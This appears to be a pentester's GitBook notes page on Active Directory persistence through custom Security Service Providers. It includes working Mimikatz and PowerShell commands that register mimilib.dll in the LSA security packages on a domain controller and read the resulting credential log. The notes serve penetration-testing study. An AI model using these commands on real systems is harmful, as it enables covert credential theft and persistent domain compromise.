☠️
Pentesting Articles and Notes
  • Welcome!
  • Windows
    • Active Directory
      • Kerberos Authentication
      • Enumeration
        • Basic Enumeration
        • Access Control Lists
        • Domain Trusts and Forests Enumeration
        • User Hunting
        • Domain Enumeration With BloodHound
      • Credential Dumping
        • DCSync Attack
      • Privilege Escalation
        • AS-REP Roasting
        • Kerberoasting
        • DNS Administrators
        • Setting Object SPN's
        • Unconstrained Delegation
        • Constrained Delegation
      • Persistence
        • Abusing ACLs
        • AdminSDHolder
        • Custom Security Service Providers (SSP's)
        • Directory Services Restore Mode (DSRM)
        • Modifying Remote Protocol Security Descriptors
        • Golden Tickets
        • Silver Tickets
        • Skeleton Keys
      • Powershell Remoting
      • Lateral Movement
        • Child to Parent Movement Across Trusts
        • Trust Abuse Between Forests
        • MSSQL Server Trust Abuse
        • Overpass the Hash
  • Coding
    • Pentesting With Python
      • Basic Threading
  • Network Attacks
    • Man-In-The-Middle Attacks
      • ARP Spoofing
      • DNS Spoofing Attacks
Powered by GitBook
On this page
  • Injecting the Custom DLL
  • Method 1 - Using Mimikatz
  • Method 2 - Drop mimilib.dll into system32 and add mimilib to the security packages
  • Check the log files for creds
  1. Windows
  2. Active Directory
  3. Persistence

Custom Security Service Providers (SSP's)

A Security Service Provider is an API which allows for authenticated connections.

Standard SSP's include:

  • NTLM

  • Kerberos

  • Negotiate

  • Secure Channel (Schannel)

  • Digest

  • Credential (CredSSP)

Upon startup, the computer loads the SSP DLL's. This allows attackers to drop their own custom DLL's which will load upon the next machine startup. This may allow us to capture credentials to use to further persist in the network.

Mimikatz provides its own custom DLL (mimilib.dll) which we can use as an example.

Injecting the Custom DLL

  • Requires Domain Admin privileges and must be performed on the DC.

Method 1 - Using Mimikatz

  • Note: this does not work very well on Server 2016

Invoke-Mimikatz -Command '"misc::memssp"'

Method 2 - Drop mimilib.dll into system32 and add mimilib to the security packages

# Step 1 - Add mimilib.dll to C:\Windows\system32

# Step 2
$packages = Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages'| select -ExpandProperty 'Security Packages'

$packages += "mimilib"

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\" -Name
'Security Packages' -Value $packages

# Then check HKEY_Local_Machine\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig in regedit to confirm the addition

Check the log files for creds

# either mimilsa.log or kiwissp.log depending on the attack
# I believe it's mimilsa.log if you use Mimikatz, kiwissp.log if you manually drop the DLL
type c:\windows\system32\mimilsa.log
PreviousAdminSDHolderNextDirectory Services Restore Mode (DSRM)

Last updated 3 years ago